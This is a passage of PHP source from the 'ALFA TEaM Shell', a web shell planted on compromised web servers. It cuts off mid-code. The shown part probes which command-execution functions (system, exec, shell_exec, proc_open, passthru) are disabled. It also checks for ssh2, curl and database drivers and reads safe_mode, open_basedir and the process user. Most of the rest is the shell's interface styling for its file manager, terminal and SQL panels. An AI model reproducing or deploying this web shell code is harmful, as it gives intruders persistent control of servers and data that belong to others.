array(\'system\',\'exec\',\'shell_exec\',\'proc_open\',\'popen\',\'passthru\',\'symlink\',\'dl\');\r\n$black_list = array();\r\n$allow_list = array();\r\nforeach($s as $d){\r\n\t$d=trim($d);\r\n\tif(empty($d)||!is_callable($d))continue;\r\n\tif(!function_exists($d)){\r\n\t\tif(in_array($d,$func)){\r\n\t\t\t$dis .= $d." | ";$b++;\r\n\t\t\t$black_list[] = $d;\r\n\t\t}else{\r\n\t\t\t$allow_list[] = $d;\r\n\t\t}\r\n\t\t$i++;\r\n\t}\r\n}\r\nif($i==0)return($afa);\r\nif($i <= count($func)){\r\n$all = array_values(array_merge($black_list, $allow_list));\r\nreturn(\'<span class="disable_functions">\'.implode(" | ", $all).\'</span>\');\r\n}\r\nreturn(\'<span class="disable_functions">\'.$dis.\'</span><a id="menu_opt_GetDisFunc" href=javascript:void(0) onclick="alfa_can_add_opt = true;g(\\\'GetDisFunc\\\',null,\\\'wp\\\');"><span class="header_show_all">Show All (\'.$i.\')</span></a>\');\r\n}\r\nfunction AlfaNum(){\r\n$args = func_get_args();\r\n$alfax = array();\r\n$find = array();\r\nfor($i=1;$i<=10;$i++){\r\n$alfax[] = $i;\r\n}\r\nforeach($args as $arg){\r\n$find[] = $arg;\r\n}\r\necho \'<script>\';\r\nforeach($alfax as $alfa){\r\nif(in_array($alfa,$find))\r\ncontinue;\r\necho \'alfa\'.$alfa."_=";\r\n}\r\necho \'""</script>\';\r\n}\r\nif(empty($_POST[\'charset\']))\r\n$_POST[\'charset\'] = $GLOBALS[\'default_charset\'];\r\n$freeSpace = function_exists(\'diskfreespace\')?@diskfreespace($GLOBALS[\'cwd\']):\'?\';\r\n$totalSpace = function_exists(\'disk_total_space\')?@disk_total_space($GLOBALS[\'cwd\']):\'?\';\r\n$totalSpace = $totalSpace?$totalSpace:1;\r\n$on="<span class=\'header_on\'> ON </span>";\r\n$of="<span class=\'header_off\'> OFF </span>";\r\n$none="<span class=\'header_none\'> NONE </span>";\r\nif(function_exists(\'ssh2_connect\'))\r\n$ssh2=$on;\r\nelse\r\n$ssh2=$of;\r\nif(function_exists(\'curl_version\'))\r\n$curl=$on;\r\nelse\r\n$curl=$of;\r\nif(function_exists(\'mysql_get_client_info\')||class_exists(\'mysqli\'))\r\n$mysql=$on;\r\nelse\r\n$mysql=$of;\r\nif(function_exists(\'mssql_connect\'))\r\n$mssql=$on;\r\nelse\r\n$mssql=$of;\r\nif(function_exists(\'pg_connect\'))\r\n$pg=$on;\r\nelse\r\n$pg=$of;\r\nif(function_exists(\'oci_connect\'))\r\n$or=$on;\r\nelse\r\n$or=$of;\r\nif(@ini_get(\'disable_functions\'))\r\n$disfun=@ini_get(\'disable_functions\');\r\nelse\r\n$disfun="All Functions Enable";\r\nif(@ini_get(\'safe_mode\'))\r\n$safe_modes="<span class=\'header_off\'>ON</span>";\r\nelse\r\n$safe_modes="<span class=\'header_on\'>OFF</span>";\r\n$cgi_shell="<span class=\'header_off\' id=\'header_cgishell\'>OFF</span>";\r\nif(@ini_get(\'open_basedir\')){\r\n$basedir_data = @ini_get(\'open_basedir\');\r\nif(strlen($basedir_data)>120){\r\n$open_b=substr($basedir_data,0, 120)."...";\r\n}else{\r\n$open_b = $basedir_data;\r\n}\r\n}else{$open_b=$none;}\r\nif(@ini_get(\'safe_mode_exec_dir\'))\r\n$safe_exe=@ini_get(\'safe_mode_exec_dir\');\r\nelse\r\n$safe_exe=$none;\r\nif(@ini_get(\'safe_mode_include_dir\'))\r\n$safe_include=@ini_get(\'safe_mode_include_dir\');\r\nelse\r\n$safe_include=$none;\r\nif(!function_exists(\'posix_getegid\'))\r\n{\r\n$user = function_exists("get_current_user")?@get_current_user():"????";\r\n$uid = function_exists("getmyuid")?@getmyuid():"????";\r\n$gid = function_exists("getmygid")?@getmygid():"????";\r\n$group = "?";\r\n}else{\r\n$uid = function_exists("posix_getpwuid")&&function_exists("posix_geteuid")?@posix_getpwuid(posix_geteuid()):array("name"=>"????", "uid"=>"????");\r\n$gid = function_exists("posix_getgrgid")&&function_exists("posix_getegid")?@posix_getgrgid(posix_getegid()):array("name"=>"????", "gid"=>"????");\r\n$user = $uid[\'name\'];\r\n$uid = $uid[\'uid\'];\r\n$group = $gid[\'name\'];\r\n$gid = $gid[\'gid\'];\r\n}\r\n$cwd_links = \'\';\r\n$path = explode("/", $GLOBALS[\'cwd\']);\r\n$n=count($path);\r\nfor($i=0; $i<$n-1; $i++) {\r\n$cwd_links .= "<a class=\'header_pwd\' onclick=\'g(\\"FilesMan\\",\\"";\r\n$cach_cwd_path = "";\r\nfor($j=0; $j<=$i; $j++){\r\n$cwd_links .= $path[$j].\'/\';\r\n$cach_cwd_path .= $path[$j].\'/\';\r\n}\r\n$cwd_links .= "\\")\' path=\'".$cach_cwd_path."\' href=\'#action=fileman&path=".$cach_cwd_path."\'>".$path[$i]."/</a>";\r\n}\r\n$drives = "";\r\nforeach(range(\'a\',\'z\') as $drive)\r\nif(@is_dir($drive.\':\\\\\'))\r\n$drives .= \'<a href="javascript:void(0);" class="header_drive" onclick="g(\\\'FilesMan\\\',\\\'\'.$drive.\':/\\\')">[ \'.$drive.\' ]</a> \';\r\n$csscode =\'\t-moz-animation-name: spin;-moz-animation-iteration-count: infinite;-moz-animation-timing-function: linear;-moz-animation-duration: 1s;-webkit-animation-name: spin;-webkit-animation-iteration-count: infinite;-webkit-animation-timing-function: linear;-webkit-animation-duration: 1s;-ms-animation-name: spin;-ms-animation-iteration-count: infinite;-ms-animation-timing-function: linear;-ms-animation-duration: 1s;animation-name: spin;animation-iteration-count: infinite;animation-timing-function: linear;animation-duration: 1s;\';\r\necho\'<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">\';?>\r\n<html xmlns="http://www.w3.org/1999/xhtml">\r\n<head>\r\n<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />\r\n<meta name="ROBOTS" content="NOINDEX, NOFOLLOW" />\r\n\r\n<link href="\'.__showicon(\'alfamini\').\'" rel="icon" type="image/x-icon"/>\r\n<title>..:: <?php echo $_SERVER[\'HTTP_HOST\'].\' ~ ALFA TEaM Shell - v\'.__ALFA_VERSION__.\'-\'.__ALFA_CODE_NAME__;?> ::..</title>\r\n<style type="text/css">\r\n.hlabale{color:#67abdf;border-radius:4px;border:1px solid #27979b;margin-left:7px;padding:2px}#tbl_sympphp tr{text-align:center}#PhpCode,.php-evals-ace,.view_ml_content{position:absolute;top:0;right:0;bottom:0;left:0;background:#1b292b26;top:50px}.editor-view{position:relative;height:100%}.view-content{position:absolute;overflow-y:auto;width:100%;height:93%}::-webkit-scrollbar-track{-webkit-box-shadow:inset 0 0 6px rgba(0,0,0,.3);border-radius:10px;background-color:#000115}::-webkit-scrollbar{width:10px;background-color:#000115}::-webkit-scrollbar-thumb{border-radius:10px;-webkit-box-shadow:inset 0 0 6px rgba(0,0,0,.3);background-color:#1e82b5}.editor-file-name{margin-left:29px;margin-top:4px;overflow:hidden;text-overflow:ellipsis;white-space:nowrap}.editor-icon{position:absolute}.is_active{background:rgba(49,55,93,.77);border-radius:10px}.history-list{height:88%;overflow-y:auto}.opt-title{position:absolute;left:50%;top:50%;transform:translate(-50%,-50%);color:#2fd051;font-size:25px;font-family:monospace}.options_min_badge{visibility:hidden;text-align:center;right:30px;color:#fff;background:#2a8a24;padding:6px;border-radius:50%;width:15px;height:15px;display:inline-block;position:absolute;top:-7px}#cgiloader-minimized,#database_window-minimized,#editor-minimized,#options_window-minimized{display:block;position:fixed;right:-30px;width:30px;height:30px;top:30%;z-index:9999}.minimized-wrapper{position:relative;background:#0e304a;width:44px;height:130px;cursor:pointer;border-bottom-left-radius:5px;border-top-left-radius:5px}.minimized-text{transform:rotate(-90deg);color:wheat;font-size:x-large;display:inline-block;position:absolute;right:-51px;width:129px;top:-10px;border-top-left-radius:4%;height:56px;padding:3px}.close-button,.editor-minimize{height:26px;width:38px;right:7px;background:#1d5673;cursor:pointer;position:absolute;box-sizing:border-box;line-height:50px;display:inline-block;top:17px;border-radius:100px}.editor-minimize{right:50px}.close-button:after,.close-button:before,.editor-minimize:before{transform:rotate(-45deg);content:"";position:absolute;top:63%;right:6px;margin-top:-5px;margin-left:-25px;display:block;height:4px;width:27px;background-color:rgba(216,207,207,.75);transition:all .25s ease-out}.editor-minimize:before{transform:rotate(0)}.close-button:after{transform:rotate(-135deg)}.close-button:hover:after,.close-button:hover:before,.editor-minimize:hover:before{background-color:red}.close-button:hover,.editor-minimize:hover{background-color:rgba(39,66,80,.96)}#cgiloader,#database_window,#editor,#options_window{display:none;position:fixed;top:0;width:100%;height:100%;z-index:20}.editor-wrapper{width:100%;height:100%;position:relative;top:1%}.editor-header{width:97%;background:rgba(21,66,88,.93);height:37px;margin-left:13px;position:relative;border-top-left-radius:15px;border-top-right-radius:15px}.editor-path{position:absolute;font-size:x-large;margin-left:10px;top:6px;color:#00ff7f}.editor-modal{position:relative;top:0;background-color:rgba(0,1,23,.95);height:90%;margin-left:20%;margin-right:2%;border:2px #0e304a solid}.editor-explorer{width:19%;height:90%;background-color:rgba(0,1,23,.94);position:absolute;z-index:2;left:1%;border:2px #0e304a solid}.editor-controller{position:relative;top:-13px}.file-holder{position:relative;width:100%;height:30px}.file-holder>.history{position:absolute;color:#03b3a3;cursor:pointer;left:5px;font-size:18px;font-family:sans-serif;width:89%;height:100%;z-index:3;border-radius:10px;transition:background-color .6s ease-out}.file-holder>.history-close{display:block;opacity:0;position:absolute;right:2px;width:20px;top:4px;text-align:center;cursor:pointer;color:#fff;background:red;border-radius:100px;font-family:monospace;z-index:10;transition:opacity .6s ease-out;font-size:15px;height:19px}.file-holder>.history:hover{background-color:#646464}.editor-explorer>.hheader{position:relative;color:#14ff07;border-bottom:2px #206aa2 solid;text-align:center;font-family:sans-serif;margin-bottom:10px;height:55px}.editor-search{position:absolute;bottom:7px;left:31px}.hheader-text{position:absolute;left:8px;top:2px}.history-clear{position:absolute;right:8px;top:2px;cursor:pointer}.editor-body{position:relative;margin-left:3px;height:100%}.editor-anim-close{-webkit-animation:editorClose .8s ease-in-out forwards;-moz-animation:editorClose .8s ease-in-out forwards;-ms-animation:editorClose .8s ease-in-out forwards;animation:editorClose .8s ease-in-out forwards}@keyframes editorClose{0%{visibility:1;opacity:1}100%{visibility:0;opacity:0}}.editor-anim-minimize{-webkit-animation:editorMinimize .8s ease-in-out forwards;-moz-animation:editorMinimize .8s ease-in-out forwards;-ms-animation:editorMinimize .8s ease-in-out forwards;animation:editorMinimize .8s ease-in-out forwards}@keyframes editorMinimize{0%{right:0;opacity:1}100%{right:-2000px;opacity:0}}.editor-anim-show{-webkit-animation:editorShow .8s ease-in-out forwards;-moz-animation:editorShow .8s ease-in-out forwards;-ms-animation:editorShow .8s ease-in-out forwards;animation:editorShow .8s ease-in-out forwards}@keyframes editorShow{0%{right:-2000px;opacity:0}100%{right:0;opacity:1}}.minimized-show{-webkit-animation:minimizeShow .8s ease-in-out forwards;-moz-animation:minimizeShow .8s ease-in-out forwards;-ms-animation:minimizeShow .8s ease-in-out forwards;animation:minimizeShow .8s ease-in-out forwards}@keyframes minimizeShow{0%{right:-30px;opacity:0}100%{right:0;opacity:1}}.minimized-hide{-webkit-animation:minimizeHide .8s ease-in-out forwards;-moz-animation:minimizeHide .8s ease-in-out forwards;-ms-animation:minimizeHide .8s ease-in-out forwards;animation:minimizeHide .8s ease-in-out forwards}@keyframes minimizeHide{0%{right:0;opacity:1}100%{right:-30px;opacity:0}}.solevisible-text:hover{-webkit-text-shadow:0 0 25px #0f0;-moz-text-shadow:0 0 25px #0f0;-ms-text-shadow:0 0 25px #0f0;text-shadow:0 0 25px #0f0}.update-holder{position:fixed;top:0;background-color:rgba(0,24,29,.72);width:100%;height:100%}.update-content{position:relative}.update-content>a{text-decoration:none;position:absolute;color:rgba(103,167,47,.77);left:24%;margin-top:7%;font-size:40px}.update-close{position:absolute;right:0;margin-right:23px;top:10px;font-size:27px;background-color:#130f50;width:5%;border-radius:100px;cursor:pointer;border:2px #0e265a solid}.update-close:hover{border:2px #25ff00 solid;color:red}.filestools{height:auto;width:auto;color:#67abdf;font-size:12px;font-family:Verdana,Geneva,sans-serif}@-moz-document url-prefix(){#search-input{width:173px}.editor-path{top:3px}}.filters-holder{padding:5px;padding-left:10px}.filters-holder input{width:200px}.filters-holder span{color:#8bc7f7}#rightclick_menu{width:175px;visibility:hidden;opacity:0;position:fixed;background:#0f304a;color:#555;font-family:sans-serif;font-size:11px;-webkit-transition:opacity .5s ease-in-out;-moz-transition:opacity .5s ease-in-out;-ms-transition:opacity .5s ease-in-out;-o-transition:opacity .5s ease-in-out;transition:opacity .5s ease-in-out;-webkit-box-shadow:-1px 0 17px 0 #8b8b8c;-moz-box-shadow:-1px 0 17px 0 #8b8b8c;box-shadow:-1px 0 17px 0 #8b8b8c;padding:0;border:1px solid #737373;border-radius:10px}#rightclick_menu a{display:block;color:#fff;font-weight:bolder;text-decoration:none;padding:6px 8px 6px 30px;position:relative;padding-left:40px}#rightclick_menu a i.fa,#rightclick_menu a img{height:20px;font-size:17px;width:20px;position:absolute;left:5px;top:2px;padding-left:5px}#rightclick_menu a span{color:#bcb1b3;float:right}#rightclick_menu a:hover{color:#fff;background:#3879d9}#rightclick_menu hr{border:1px solid #ebebeb;border-bottom:0}.cl-popup-fixed{position:fixed;top:0;left:0;width:100%;height:100%;background:#201e1ead}#shortcutMenu-holder{position:absolute;top:40%;left:50%;transform:translate(-50%,-50%);background:#1f1e1edb;height:190px;width:500px;color:#fff}#shortcutMenu-holder>.popup-head{background:#207174;padding:6px;border-top:10px;text-align:center;font-family:sans-serif;color:#fff}#shortcutMenu-holder>form{padding:10px}#shortcutMenu-holder>form>label{display:block}#shortcutMenu-holder>form>input{width:99%;height:24px;margin-top:4px;color:#fff;outline:0;font-size:16px}#shortcutMenu-holder>.popup-foot{float:right;height:30px;margin-right:8px}#shortcutMenu-holder>.popup-foot>button{height:100%;cursor:pointer;color:#fff;outline:0}.php-terminal-output{overflow:auto;height:86%;border:1px solid #1e5673;border-radius:10px}.cmd-history-holder{visibility:hidden;opacity:0;position:absolute;color:#dff3d5;background:#093d58;top:-300px;height:300px;width:calc(69% + -11px);border-radius:10px 10px 0 0;left:calc(2% - 9px);transition:visibility .5s,opacity .5s linear}.cmd-history-holder .commands-history-header{background:#37504e;text-align:center;border-radius:10px 10px 0 0}.cmd-history-icon{width:27px;top:6px;left:calc(69% + 5px);position:absolute;cursor:pointer}.history-cmd-line{padding:4px;border-bottom:1px dashed;cursor:pointer}.history-cmd-line:hover{background:#961111}#myUL,#myUL ul{list-style-type:none}#myUL{margin:0;padding:0}.box{cursor:pointer;-webkit-user-select:none;-moz-user-select:none;-ms-user-select:none;user-select:none}.box::before{content:"\\2610";color:#000;display:inline-block;margin-right:6px}.check-box::before{content:"\\2611";color:#1e90ff}.nested{display:none}.active{display:block}.flag-holder>img{width:20px;vertical-align:middle;padding-left:6px}#options_window .content_options_holder .options_holder{position:relative;display:none;overflow:auto;min-height:300px;max-height:calc(100vh - 100px)}#options_window .content_options_holder .options_holder .header{min-height:50vh}#options_window .content_options_holder .options_holder.option_is_active{display:block}#options_window .content_options_holder .options_tab{padding:5px;margin-left:14px;margin-right:30px;background:#000;border-bottom:7px solid #0f304a;border-left:7px solid #0f304a;border-right:7px solid #0f304a;overflow-x:auto;white-space:nowrap}#filesman_tabs .filesman_tab img,#options_window .content_options_holder .options_tab .tab_name img,.editor-tab-name img,.sql-tabs .sql-tabname img,.terminal-tabs .terminal-tab img{width:10px;vertical-align:middle;margin-left:5px}#filesman_tabs .filesman_tab,#options_window .content_options_holder .options_tab .tab_name,.editor-tab-name,.sql-tabs .sql-newtab,.sql-tabs .sql-tabname,.terminal-tabs .terminal-tab{display:inline-block;background-color:#133d51;border-radius:4px;padding:5px;color:#fff;margin-right:3px;padding:5px;cursor:pointer;margin-bottom:1px;transition:background-color .5s}#filesman_tabs .filesman_tab{min-width:55px;text-align:center}#filesman_tabs .filesman_tab:hover,#options_window .content_options_holder .options_tab .tab_name:hover,.editor-tab-name:hover,.sql-tabs .sql-tabname:hover,.terminal-tabs .terminal-tab:hover{background-color:#a23939}.editor-tabs,.sql-tabs,.terminal-tabs{padding:5px;overflow-x:auto;white-space:nowrap}.options-loader-holder{position:absolute;top:0;left:0;width:100%;height:100%;background:#2b2626c7;z-index:11}.options-loader-holder img{position:absolute;top:32%;left:45%;transform:translate(-50%,-50%);width:100px;animation:spin 2s infinite}#filesman_tabs .filesman_tab.filesman-tab-active,#options_window .content_options_holder .options_tab .tab_name.tab_is_active,.editor-tab-name.editor-tab-active,.sql-tabname.sql-active-tab,.terminal-tab.active-terminal-tab{background-color:#009688}.tab-is-done{animation:2s tab_change_color infinite step-end}.stopAjax{color:#fff;font-size:20px;display:inline-block;padding:10px;cursor:pointer}#a_loader{display:none;position:fixed;top:0;left:0;width:100%;height:100%;background:#2b2626c7;z-index:99}.fmanager-row>td{position:relative}.fmanager-row .symlink_path{position:fixed;max-width:100%;background-color:#0f304a;border-radius:10px;font-size:15px;padding:8px;color:#fdf4f4;border:1px solid #8a8a8a;z-index:1;pointer-events:none}.archive-icons{vertical-align:middle}.archive-type-dir{font-weight:bolder}.archive-type-file{font-weight:unset}.archive-name{cursor:pointer}.archive_dir_holder a{color:#0f0;font-weight:bolder;cursor:pointer}.archive_dir_holder a:hover{color:#fff}.editor-content{height:100%}.editor-content-holder{height:90%}.editor-contents{display:none;position:relative;height:100%}.editor-contents.editor-content-active{display:block}.history-panel-controller{position:absolute;color:#fff;padding:10px;z-index:1000;border-radius:10px;top:50%;left:19%;background-color:#009687;cursor:pointer}.sql-content{display:none;position:relative;min-height:300px}.sql-content.sql-active-content{display:block}.pages-holder{padding:7px}.pages-number{display:inline-block;margin-left:10px}.pages-holder .pages-number a.page-number{padding:5px;background:#0f304a;margin-right:8px;cursor:pointer;width:33px;display:inline-block;text-align:center;border-radius:5px;color:#fff;transition:background .5s}.active-page-number{background:#10925c!important}.pages-number a.page-number:hover{background:#8a8a8a}.terminal-content{height:100%}.terminal-content,.terminal-tab{display:none}.terminal-content.active-terminal-content{display:block;position:relative}.terminal-btn-fontctl{background:#009688;width:50px;color:#fff;font-weight:bolder;outline:0;cursor:pointer}.alert-area{max-height:100%;position:fixed;bottom:5px;left:20px;right:20px;z-index:9999}.alert-box{font-size:16px;color:#fff;background:rgba(0,0,0,.9);line-height:1.3em;padding:10px 15px;margin:5px 10px;position:relative;border-radius:5px;transition:opacity .5s ease-in;-webkit-animation:alert-shake .5s ease-in-out;animation:alert-shake .5s ease-in-out}.alert-content-title{font-weight:700}.alert-box.alert-success{background:rgba(56,127,56,.89)}.alert-error{background:rgba(191,54,54,.89)}.alert-box.hide{opacity:0}.alert-close{background:0 0;width:12px;height:12px;position:absolute;top:15px;right:15px}.alert-close:after,.alert-close:before{content:"";width:15px;border-top:solid 2px #fff;position:absolute;top:5px;right:-1px;display:block}.alert-close:before{transform:rotate(45deg)}.alert-close:after{transform:rotate(135deg)}.alert-close:hover:after,.alert-close:hover:before{border-top:solid 2px #d8d8d8}@media (max-width:767px) and (min-width:481px){.alert-area{left:100px;right:100px}}@media (min-width:768px){.alert-area{width:350px;left:auto;right:0;z-index:9999}}@keyframes tab_change_color{0%{background-color:#133d51}50%{background-color:green}}@-webkit-keyframes alert-shake{0%{-webkit-transform:translateX(0)}20%{-webkit-transform:translateX(-10px)}40%{-webkit-transform:translateX(10px)}60%{-webkit-transform:translateX(-10px)}80%{-webkit-transform:translateX(10px)}100%{-webkit-transform:translateX(0)}}@keyframes alert-shake{0%{transform:translateX(0)}20%{transform:translateX(-10px)}40%{transform:translateX(10px)}60%{transform:translateX(-10px)}80%{transform:translateX(10px)}100%{transform:translateX(0)}}.textEffect{position:absolute;width:500px;top:-10px;animation:alert-shake .5s ease-in-out;animation-iteration-count:2}.alfateam-loader-text{position:absolute;color:#46bb45;top:23%;left:49%;transform:translate(-50%,-50%);font-size:40px;letter-spacing:7px}.alfa-ajax-error{position:absolute;color:#ff0a0a;top:50%;left:50%;transform:translate(-50%,-50%);font-size:30px}.connection-hist-table{margin-left:auto;margin-right:auto;text-align:justify;border-collapse:collapse}.connection-hist-table td,.connection-hist-table th{border:1px solid #ddd;text-align:left;padding:8px}.connection-his-btn{margin-bottom:10px;padding:5px;background:#206920;color:#fff;border:none;outline:0;cursor:pointer;font-weight:700;transition:background .3s}.connection-his-btn.connection-delete{margin:unset;padding:5px;background:red;width:33px;border-radius:3px;transition:background .3s}.connection-delete:hover{background:#f56969!important}.connection-his-btn:hover{background:#30b330}#up_bar_holder{position:fixed;z-index:100000;width:100%}#filesman_tabs{padding:8px;border:1px solid #0e304a;color:#67abdf;overflow-x:auto;white-space:nowrap}.sortable-ghost{opacity:.5;background:#c8ebfb}.folder-tab-icon{width:16px!important}#filesman-tab-full-path{display:none;position:absolute;pointer-events:none;background:#163746;padding:7px;color:#0f0;border-radius:10px;min-width:58px;z-index:10}#filesman-tab-full-path::after{content:"";position:absolute;top:100%;left:35px;margin-left:-5px;border-width:5px;border-style:solid;pointer-events:none;border-color:#163746 transparent transparent transparent}.mysql-main{height:84vh;position:relative}.mysql-hide-content{display:none}.mysql-query-result-tabs{margin-bottom:10px;padding:3px;border-bottom:4px solid #0f304a}.mysql-main .tables-panel-ctl{position:absolute;color:#fff;padding:10px;z-index:1;border-radius:10px;top:45%;left:calc(17% + 10px);background-color:#009687;cursor:pointer}.tables-panel-ctl-min{left:-21px!important}.mysql-query-result-tabs div{display:inline-block;padding:5px;margin-right:2px;background:#133d51;color:#fff;cursor:pointer;transition:background-color .5s}.mysql-query-result-tabs div:hover{background-color:#a23939}.mysql-query-result-tabs div.mysql-query-selected-tab{background:red}table tr.tbl_row:nth-child(odd){background:#424040}.mysql-tables .tables-row{margin-left:26px}.mysql-main .mysql-query-results,.mysql-main .mysql-tables{float:left;height:100%;overflow:auto}.mysql-main .mysql-query-results{width:calc(80% + 4px);margin-left:5px;position:relative;overflow:unset}.mysql-main .mysql-query-results-fixed{width:100%}.mysql-main .mysql-query-results .mysql-query-content{height:89%;overflow:auto}.mysql-query-tab-hide{height:0!important;padding:0!important}.mysql-main .mysql-tables{width:19%;border-right:4px solid #0e304a}.mysql-main table td{vertical-align:top}.mysql-main .mysql-search-area table td{vertical-align:middle;padding:7px}.mysql-tables .block{position:relative;width:1.5em;height:1.5em;min-width:16px;min-height:16px;float:left}.mysql-tables div.block b,.mysql-tables div.block i{width:1.5em;height:1.7em;min-width:16px;min-height:8px;position:absolute;bottom:.7em;left:.75em;z-index:0}.mysql-tables .block i{display:block;border-left:1px solid #666;border-bottom:1px solid #666;position:relative;z-index:0}.mysql-tables .block b{display:block;height:.75em;bottom:0;left:.75em;border-left:1px solid #666}.mysql-tables div.block a,.mysql-tables div.block u{position:absolute;left:50%;top:50%;z-index:10}.mysql-tables div.block img{position:relative;top:-.6em;left:0;margin-left:-7px}.mysql-tables .clearfloat{clear:both}.mysql-tables ul{list-style-type:none;margin-left:0;padding:0}.mysql-tables ul li{white-space:nowrap;clear:both;min-height:16px}.mysql-tables .db_name{margin-left:10px}.mysql-tables .list_container{border-left:1px solid #666;margin-left:.75em;padding-left:.75em}.hide-db-tables{display:none}.mysql-main:after{content:"";display:table;clear:both}table.mysql-data-tbl{border:none!important;border-collapse:collapse!important}table.mysql-data-tbl tr th{padding:5px}table.mysql-data-tbl td{border-left:3px solid #305a8d;border-right:3px solid #305a8d;padding:6px}table.mysql-data-tbl td:first-child{border-left:none}table.mysql-data-tbl td:last-child{border-right:none}.mysql-insert-result,.mysql-structure-qres,.mysql-update-result{display:none;text-align:center;padding:10px;border:1px dashed;margin:22px}#alfa-copyright{margin-top:15px}.ic_b_plus{background-image:url(http://solevisible.com/icons/menu/b_plus.png)}.ic_b_minus{background-image:url(http://solevisible.com/icons/menu/b_minus.png)}\r\n<?php echo \'\r\n\r\n@keyframes spin {from {transform: rotate(0deg);}to{transform: rotate(360deg);}}\r\n@-webkit-keyframes spin {from {-webkit-transform: rotate(0deg);}to {-webkit-transform: rotate(360deg);}}\r\n@-moz-keyframes spin {from {-moz-transform: rotate(0deg);}to {-moz-transform: rotate(360deg);}}\r\n@-ms-keyframes spin {from {-ms-transform: rotate(0deg);}to {-ms-transform: rotate(360deg);}}\r\n#alfaloader{\'.$csscode.\'width:100px;height:100px;}\r\n#a_loader img{\'.$csscode.\'width:150px;height:150px;position:fixed;z-index:999999;top: 31%;left: 45%;}\r\n.ajaxarea{display:none;border:1px solid #0E304A;color:#67ABDF}.up_bar{margin-bottom: 2px;transition:width 2s;background-color:red;width:0;height:8px;display:none;}#hidden_sh{background-color:#0E304A;text-align:center;position:absolute;right:0;left:90%;border-bottom-left-radius:2em}.alert_green{color:#0F0;font-family:"Comic Sans MS";font-size:small;text-decoration:none}.whole{background-color:#000;background-image:url(http://solevisible.com/images/alfabg.png);background-position:center;background-attachment:fixed;background-repeat:no-repeat}.header{height:auto;width:auto;border:7px solid #0E304A;color:\'.alfa_getColor("header_values").\';font-size:12px;font-family:Verdana,Geneva,sans-serif}.header a{text-decoration:none;}.filestools a{color:#0F0;text-decoration:none}.filestools a:hover{color:#FFF;text-decoration:none;}span{font-weight:bolder;color:#FFF}.txtfont{font-family:"Comic Sans MS";font-size:small;color:#fff;display:inline-block}.txtfont_header{font-family:"Comic Sans MS";font-size:large;display:inline-block;color:#59cc33}.tbltxt{font-family:"Comic Sans MS";color:#fff;font-size:small;display:inline-block}input[type="file"]{display:none}.inputfile{border:1px solid #0E304A;background:transparent;box-shadow:0 0 4px #0E304A;border-radius:4px;height:20px;width:250px;text-overflow:ellipsis;white-space:nowrap;cursor:pointer;display:inline-block;overflow:hidden}.inputfile:hover{box-shadow:0 0 4px #27979B;border:1px solid #27979B;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:4px;-webkit-box-shadow:rgba(0,119,0) 0 0 4px;-moz-box-shadow:rgba(0,119,0) 0 0 4px}.inputfile span,.inputfile strong{padding:2px;padding-left:10px}.inputfile span{color:#25ff00;width:90px;min-height:2em;display:inline-block;text-overflow:ellipsis;white-space:nowrap;overflow:hidden;vertical-align:top;float:left}.inputfile strong{background-image:url(\'.__showicon(\'alfamini\').\');background-repeat:no-repeat;background-position:float;height:100%;width:109px;color:#fff;background-color:#0E304A;display:inline-block;float:right}.inputfile:focus strong,.inputfile.has-focus strong,.inputfile:hover strong{background-color:#46647A}.button{padding:3px}#addup,.button{outline:none;cursor:pointer;border:1px solid #0E304A;background:transparent;box-shadow:0 0 4px #0E304A;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:100px;-webkit-box-shadow:#555 0 0 4px;-moz-box-shadow:#555 0 0 4px;background-color:#000;color:green;border-radius:100px}#addup:hover,.button:hover{box-shadow:0 0 4px #27979B;border:1px solid #27979B;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:100px;-webkit-box-shadow:rgba(0,119,0) 0 0 4px;-moz-box-shadow:rgba(0,119,0) 0 0 4px}input[type=text]:disabled:hover{cursor:not-allowed}td{padding:\'.($GLOBALS[\'DB_NAME\'][\'show_icons\']==\'1\'?\'0\':\'1\').\'px}.myCheckbox{padding-left:2px}.myCheckbox label{display:inline-block;cursor:pointer;position:relative}.myCheckbox input[type=checkbox]{display:none}.myCheckbox label:before{content:"";display:inline-block;width:14px;height:13px;position:absolute;background-color:#aaa;box-shadow:inset 0 2px 3px 0 rgba(0,0,0,.3),0 1px 0 0 rgba(255,255,255,.8)}.myCheckbox label{margin-bottom:15px;padding-right:17px}.myCheckbox label:before{border-radius:100px}input[type=checkbox]:checked + label:before{content:"";background-color:#0E304A;background-image:url(\'.__showicon(\'alfamini\').\');background-repeat:no-repeat;background-position:50% 50%;background-size:14px 14px;box-shadow:0 0 4px #0F0}#meunlist{font-family:Verdana,Geneva,sans-serif;color:#FFF;width:auto;border-right-width:7px;border-left-width:7px;height:auto;font-size:12px;font-weight:700;border-top-width:0;border-color:#0E304A;border-style:solid}.whole #meunlist ul{text-align:center;list-style-type:none;margin:0;padding:5px 5px 7px 2px}.whole #meunlist li{margin:0;padding:0;display:inline}.whole #meunlist a{font-family:arial,sans-serif;font-size:14px;text-decoration:none;font-weight:700;clear:both;width:100px;margin-right:-6px;border-right-width:1px;border-right-style:solid;border-right-color:#FFF;padding:3px 15px}.foot{font-family:Verdana,Geneva,sans-serif;margin:0;padding:0;width:100%;text-align:center;font-size:12px;color:#0E304A;border-right-width:7px;border-left-width:7px;border-bottom-width:7px;border-bottom-style:solid;border-right-style:solid;border-right-style:solid;border-left-style:solid;border-color:#0E304A}#text{text-align:center}input[type=submit]{cursor:pointer;background-image:url(\'.__showicon(\'btn\').\');background-repeat:no-repeat;background-position:50% 50%;background-size:23px 23px;background-color:#000;width:30px;height:30px;border:1px solid #27979B;border-radius:100px}textarea{padding:3px;color:#999;text-shadow:#777 0 0 3px;border:1px solid #0E304A;background:transparent;box-shadow:0 0 4px #0E304A;padding:3px;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:4px;-webkit-box-shadow:#555 0 0 4px;-moz-box-shadow:#555 0 0 4px}textarea:hover{color:#FFF;text-shadow:#060 0 0 6px;box-shadow:0 0 4px #27979B;border:1px solid #27979B;padding:3px;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:4px;-webkit-box-shadow:rgba(0,119,0) 0 0 4px;-moz-box-shadow:rgba(0,119,0) 0 0 4px}input[type=text],input[type=number],.alfa_custom_cmd_btn{padding:3px;color:#999;text-shadow:#777 0 0 3px;border:1px solid 